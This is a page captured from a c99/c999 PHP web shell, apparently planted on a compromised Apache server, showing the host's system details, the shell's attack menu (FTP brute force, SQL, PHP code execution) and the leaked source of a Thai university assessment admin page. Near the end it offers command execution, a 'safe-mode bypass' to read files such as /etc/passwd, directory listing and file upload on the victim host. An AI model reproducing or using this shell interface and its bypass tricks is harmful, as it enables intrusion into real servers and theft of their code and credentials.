!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis/eassess/admin/   drwxr-xr-x
Free 51.01 GB of 127.8 GB (39.91%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     searchTRepCloseDate.php (8.29 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
include_once "template.php";
showHeader();
include_once 
"../class/clsReg_AcadYearConfig.php";
include_once 
"../class/clsReg_SysSemesterDes.php";
include_once 
"../class/clsAssessForm.php";
include_once 
"../class/clsDoAssessmentTeach.php";
include_once 
"../class/clsDefineAssessment.php";

confirmSubmit();
checkFormat();
OpenWindow1();

$oCR = new clsConnection($GLOBALS['HOST'], $GLOBALS['DB_REG'], $GLOBALS['USER_REG'], $GLOBALS['PASSWORD_REG']);
$oCA = new clsConnection($GLOBALS['HOST'], $GLOBALS['DB_EASS'], $GLOBALS['USER_EASS'], $GLOBALS['PASSWORD_EASS']);

$oAF = new AssessForm($oCA);
$oDA = new DefineAssessment($oCA);
$oDoTe = new DoAssessmentTeach($oCA);
$oSse = new SysSemesterDes($oCR);

if(!
$acadYear)
    
$acadYear $GLOBALS["ACADYEAR"];
if(!
$semester)
    
$semester $GLOBALS["SEMESTER"];

if(
$acadYearList == "")
    
$acadYearList $GLOBALS["ACADYEAR"];
if(!
$semesterList)
    
$semesterList $GLOBALS["SEMESTER"];

$DoAssTeach $oDoTe->CountDoTeachidByDefineid($oDA->defineid);
?>

<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<link href="../source/style.css" rel="stylesheet" type="text/css"><table width="740" border="0" align="center" cellpadding="0" cellspacing="0">
    <tr>
        <td><br><fieldset>
        <legend><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"><a href="index.php?mm=1">ผลการประเมิน</a> <img src="../picture/ico3.gif" align="absmiddle" border="0"> รายงานรายชื่ออาจารย์ที่ยังไม่ได้ทำการประเมิน</font></legend>
        <div align="center"><br>
        <table width="699" align="center" border="0" cellpadding="0" cellspacing="1">
                <tr>
              <td align="center" colspan="2"><strong><font color="<?php echo $GLOBALS['COLOR_FONT_3'];?>" size="3">รายงานรายชื่ออาจารย์ที่ยังไม่ได้ทำการประเมิน</font></strong></td>
            </tr>
                
                <tr>
                    <td colspan="2"><table width="699" border="1" align="center" cellpadding="0" cellspacing="0" bordercolor="<?php echo $GLOBALS["COLOR_BORDER_TABLE_1"];?>">
                  <tr> 
                    <td colspan="7" align="center"><br> 
                      <br>
                      <table width="343" border="0" align="right">
                        <tr> 
                          <td width="347" height="35" align="center" background="../picture/coverBG2.gif"><font size="2" color="<?php echo $GLOBALS['COLOR_FONT_1'];?>">&nbsp;<b>ปีการศึกษา 
                            : </b></font> <font size="2" color="<?php echo $GLOBALS['COLOR_FONT_4'];?>"><b> 
                              <select name="select2" onChange="location.href = '<?php echo $PHP_SELF;?>?acadYearList='+encodeURI(options[selectedIndex].value)+'&amp;semesterList=<?php echo $semesterList;?>'">
                                <?php
                                $oAy
->RSAcadYearConfigGroupAcY();
                                while(
$oAy->GetRecord()) {
?>
                                <option value="<?php echo $oAy->acadYear;?><? if($acadYearList == $oAy->acadYear) echo "selected"?>><?php echo $oAy->acadYear;?></option>
                                <?php                
                                
}
?>
                            </select>
                              </b></font><font size="2" color="<?php echo $GLOBALS['COLOR_FONT_1'];?>">&nbsp;<b>ภาคการศึกษา 
                                : 
                                <select name="select" onChange="location.href ='<?php echo $PHP_SELF;?>?semesterList='+encodeURI(options[selectedIndex].value)+'&amp;acadYearList=<?php echo $acadYearList;?>'">
                                  <?php
                                $oSse
->RSSysSemesterDes();
                                while(
$oSse->GetRecord()) {
?>
                                  <option value="<?php echo $oSse->semester;?><? if($semesterList == $oSse->semester) echo "selected"?>><?php echo $oSse->semesterName;?></option>
                                  <?php
                                        
}
?>
                              </select>
                                </b></font></td>
                        </tr>
                      </table> </td></tr>
                  <tr bgcolor="<?php echo $GLOBALS["COLOR_BG_TABLE_2"];?>"> 
                    <td width="88" height="22" align="center"><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_1"];?>"><strong>ภาคการศึกษาที่</strong></font></td>
                    <td width="34" align="center"><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_1"];?>"><strong>ลำดับ</strong></font></td>
                    <td width="304" height="22" align="center"><font color="<?php echo $GLOBALS["COLOR_FONT_1"];?>" size="2"><strong>รายการแบบประเมิน</strong></font></td>
                    <td width="192" align="center"><font color="<?php echo $GLOBALS["COLOR_FONT_1"];?>" size="2"><strong>ช่วงเวลาในการประเมิน</strong></font></td>
                  </tr>
<?php
                $oDA
->SearchByFlag('4');
                
//$numRow = $oDA->NumRow();
                
$numRow $oDA->CountDefineidByFlagAcadSem('4',$acadYearList,$semesterList);
                
$page_size 12;
                
$total_page = (int)($numRow/$page_size);
                if((
$numRow%$page_size) != 0)
                    
$total_page++;

                if(isset(
$page_id))
                    
$start $page_size*($page_id-1);
                else {
                    
$page_id 1;
                    
$start 0;
                }
                
$i 0;
                
//$oDA->RSAssessLimitByFlag('0',$start, $page_size);
                
$oDA->RSAssessLimitByAcadSemFlag($acadYearList,$semesterList,'4',$start$page_size);
                while(
$oDA->GetRecord()){
                    
//นับจำนวนการประเมินว่ามีการประเมินหลังจากที่กำหนดแบบประเมินและช่วงเวลาไปแล้วหรือไม่  ถ้ามีจะไม่สามารถลบการกำหนดช่วงเวลาในการประเมินไปแล้วได้
                    
$numDoAss=$oDoTe->CountDoidByDefineid($oDA->defineid);
                    
$oAF->SearchByKey($oDA->assid);
                    
$oAF->GetRecord();
                    
//หาความยาวของชื่อแบบประเมิน    
                    
$strNameAss strlen($oAF->nameAss);
                
                    
//$oAF->RSAssessLimit($oDA->assid,$start, $page_size);
                    //$oAF->GetRecord();
                    
if(($i%2) == 0)
                        echo 
"<tr>";
                    else
                        echo 
"<tr bgcolor=\"".$GLOBALS["COLOR_BG_TD_4"]."\">";
?>
                    <td align="center"><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>"><?php echo $oDA->semester;?>/<?php echo $oDA->acadYear?></font></td>
                    <td align="center"><?php echo $oDA->noAss;?></td>
                    <td><a href="detailTeacherNotAssess.php?defineid=<?php echo $oDA->defineid?>&acadYear=<?php echo $oDA->acadYear;?>&semester=<?php echo $oDA->semester;?>&noAss=<?php echo $oDA->noAss;?>"  class='box'  border="0" align="absmiddle" id=IMG3 style="CURSOR: hand" onmouseover="window.status=''; return true;"
title="วันที่ปิดการประเมิน <?php  echo abbreDate2($oDA->closeDate,'/');?>"><img src="../picture/search.gif" width="13" height="16" border="0"> 
                    <?php  if($oAF->maintopic == ""){ echo substr($oAF->nameAss,0,49)."<img src = \"../picture/warn.png\" border = \"0\">"$strNameAss strlen($oAF->nameAss);  if($strNameAss >= 49) echo "..."; }else{ echo substr($oAF->maintopic,0,49); $strNameAss strlen($oAF->maintopic);  if($strNameAss >= 49) echo "..."; } ?></a></font></td>
                    <td align="center"><?php  echo abbreDate2($oDA->startDate,'/');?>  (ถึง) <?php  echo abbreDate2($oDA->endDate,'/');?></td>

                  </tr>
 <?php
                        $i
++;
                } 
//end while oDA
                        
                        
if($i == 0){
?>
                  <tr> 
                    <td colspan="6" height="22" align="center"><font size="2" color="<?php echo $GLOBALS['COLOR_FONT_3'];?>">** 
                      ไม่ปรากฏรายการในฐานข้อมูล **</font></td>
                  </tr>
                  <?php
                        
}
?>
                </table></td>
                </tr>
                <tr>
                    <td><font size="2" color="<?php echo $GLOBALS['COLOR_FONT_4'];?>">หน้า-&gt;
<?php    
                    
for ($num=1$num<=$total_page$num++) {    
                        if(
$num == $page_id)
                            echo 
$num." ";
                        else {
?>
                            <a href="addDefineTeacher.php?page_id=<?php echo $num;?>&semesterList=<? echo $semesterList ?>&acadYearList=<? echo $acadYearList ?>"><?php echo '[ '.$num.' ]';?></a> 
<?php
                        
}
                    }
?>
                    </font></td>
                    <td width="388" align="right"><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>">รวม <?php echo $numRow;?> รายการ</font></td>
                </tr>
                <tr>
                    <td colspan="2"><input type="button" name="back2" value="กลับเมนูหลัก" onClick=" location.href = 'index.php?mm=1'">
              </td>
                </tr>
            </table>
        </div>
        </fieldset></td>
    </tr>
</table>
<form name="silent" id="silent" style="margin:0px; padding: 0px;" method="post"></form>
<?php
showFooter
();
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0107 ]--